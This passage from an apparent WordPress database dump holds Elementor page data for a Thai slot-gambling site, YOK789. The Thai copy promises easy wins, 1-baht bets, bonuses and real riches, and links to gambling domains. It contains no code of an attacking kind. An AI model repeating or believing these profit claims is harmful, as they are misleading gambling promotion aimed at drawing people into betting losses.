\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2425,331,'_thumbnail_id','273'),(2426,331,'_elementor_edit_mode','builder'),(2427,331,'_elementor_template_type','wp-page'),(2428,331,'_elementor_version','3.35.5'),(2429,331,'_elementor_pro_version','3.32.3'),(2430,331,'_wp_page_template','default'),(2431,331,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2432,331,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-Yok789.webp\",\"id\":274,\"size\":\"\",\"alt\":\"YOK789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-Yok789.webp\",\"id\":278,\"size\":\"\",\"alt\":\"Yok789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>YOK789<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e04\\u0e37\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e27\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e25\\u0e2d\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e01\\u0e47\\u0e44\\u0e25\\u0e48\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2a\\u0e1b\\u0e35\\u0e14 \\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e40\\u0e15\\u0e34\\u0e21\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e36\\u0e01\\u0e04\\u0e31\\u0e01\\u0e1c\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e27\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e19\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e2a\\u0e19\\u0e43\\u0e08\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e31\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e35\\u0e41\\u0e04\\u0e48\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e42\\u0e04\\u0e15\\u0e23\\u0e44\\u0e27 \\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2b\\u0e19\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e41\\u0e25\\u0e30\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e16\\u0e39\\u0e01\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e04\\u0e2d\\u0e22\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e35\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e34\\u0e14\\u0e02\\u0e36\\u0e49\\u0e19 <\\/span><a href=\\\"https:\\/\\/luca333auto.com\\/\\\"><b>\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2a\\u0e21\\u0e48\\u0e33\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e08\\u0e33\\u0e40\\u0e08 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e44\\u0e23\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e2a\\u0e14\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e49\\u0e19\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e18\\u0e23\\u0e23\\u0e21\\u0e14\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><span style=\\\"color: #99cc00;\\\"><b>YOK789 <\\/b><\\/span><b><span style=\\\"color: #99cc00;\\\">\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21<\\/span> <\\/b><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e22\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e27\\u0e35\\u0e22\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e48\\u0e27\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e21\\u0e35\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e01\\u0e15\\u0e34 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e35\\u0e04\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e1a\\u0e39\\u0e2a\\u0e15\\u0e4c\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e14\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e35\\u0e22\\u0e19 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 